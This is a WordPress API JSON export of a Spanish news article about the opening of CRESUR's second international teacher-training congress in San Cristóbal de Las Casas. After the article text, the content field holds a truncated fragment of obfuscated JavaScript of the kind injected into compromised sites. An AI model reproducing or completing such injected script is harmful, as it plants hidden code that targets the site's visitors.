{"id":4293,"date":"2022-08-11T03:27:05","date_gmt":"2022-08-11T03:27:05","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4293"},"modified":"2022-08-11T03:27:05","modified_gmt":"2022-08-11T03:27:05","slug":"inicia-2o-congreso-internacional-de-formacion-docente-e-investigacion-educativa-del-cresur","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4293","title":{"rendered":"Inicia 2\u00ba Congreso Internacional de Formaci\u00f3n Docente e Investigaci\u00f3n Educativa del CRESUR"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-10-at-4.19.02-PM-1024x682.jpeg\" alt=\"\" class=\"wp-image-4294\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-10-at-4.19.02-PM-1024x682.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-10-at-4.19.02-PM-300x200.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-10-at-4.19.02-PM-768x512.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-10-at-4.19.02-PM-310x205.jpeg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-10-at-4.19.02-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mezSan Crist\u00f3bal de Las Casas.- El rector del Centro Regional de Formaci\u00f3n Docente e Investigaci\u00f3n Educativa (Cresur), Abraham Velasco Hern\u00e1ndez, dio a conocer que este mi\u00e9rcoles inici\u00f3 del 2\u00ba Congreso Internacional de Formaci\u00f3n Docente e Investigaci\u00f3n Educativa, el cual va dirigido a docentes, formadores o candidatos a docentes, para reflexionar los nuevos avatares por los que atraviesan los docentes, el cual tiene como sede, las instalaciones de la Universidad Intercultural de Chiapas (UNICH).\u201cEs un congreso pensado para educadores, formadores o candidatos a ser docentes, para reflexionar, reflexionar la pr\u00e1ctica educativa, sobre todo por los nuevos avatares que atraviesa la poblaci\u00f3n docente, con respecto al nuevo plan curricular, a los nuevos desaf\u00edos emergentes de la vida y la intenci\u00f3n es que intercambiemos ideas  entre profesionales de la educaci\u00f3n en distintos rubros y \u00e1mbitos de competencias para contribuir al presente educativo\u201d, dijo.Entre los temas a abordar de ponentes, talleristas nacionales y extranjeros est\u00e1n, mejora continua, did\u00e1ctica, metodolog\u00eda, fundamentos metodol\u00f3gicos de la educaci\u00f3n, por mencionar algunos, \u201cel cual se puede resumir en herramientas did\u00e1cticas metodol\u00f3gicas que el maestro y otros actores necesitan para su quehacer educativo\u201d.Velasco Hern\u00e1ndez revel\u00f3 que hasta este mi\u00e9rcoles participaban 375 personas, entre ponentes, asistentes, investigadores, talleristas, contando con una gran presencia de j\u00f3venes normalistas, quienes sabemos buscan conocer las experiencias de quienes ya est\u00e1n activos en labores docentes.Dej\u00f3 ver que quienes est\u00e9n interesados, a\u00fan pueden inscribirse desde la p\u00e1gina de CRESUR, ya que entre el jueves y viernes, hay varios temas destacables, y al concluir se les dar\u00e1 constancias o reconocimientos, dependiendo su inter\u00e9s.Durante el acto protocolario de inauguraci\u00f3n, la rectora de la UNICH, Leticia Pons Bonals, destac\u00f3 el evento, ya que hoy se habla de una nueva normalidad, lo cual nos asemeja al manejo de nuevas tecnolog\u00edas, \u201cla pandemia nos ha dejado aprendizajes, rezagos, cuestiones que tenemos que debatir, discutir y tomar decisiones, hoy en d\u00eda no podemos pensar en educaci\u00f3n como el de antes de la pandemia\u201d.\u201cEn este Segundo congreso, esperamos debatir los temas que tienen que ver con la gesti\u00f3n y administraci\u00f3n de la educaci\u00f3n, del proceso ense\u00f1anza-aprendizaje, de ampliar las posibilidades educativas para todos los sectores sociales, y el objetivo de la UNICH es brindar estos servicios educativos a los grupos vulnerables\u201d, puntualiz\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mezSan Crist\u00f3bal de Las Casas.- El rector del Centro Regional de Formaci\u00f3n Docente e Investigaci\u00f3n Educativa (Cresur), Abraham Velasco Hern\u00e1ndez, dio a conocer que este mi\u00e9rcoles inici\u00f3 del 2\u00ba Congreso Internacional de Formaci\u00f3n Docente e Investigaci\u00f3n Educativa, el cual va dirigido a docentes, formadores o candidatos a docentes, para reflexionar los nuevos avatares por &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4294,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-4293","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4293","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4293"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4293\/revisions"}],"predecessor-version":[{"id":4295,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4293\/revisions\/4295"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4294"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4293"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4293"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4293"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}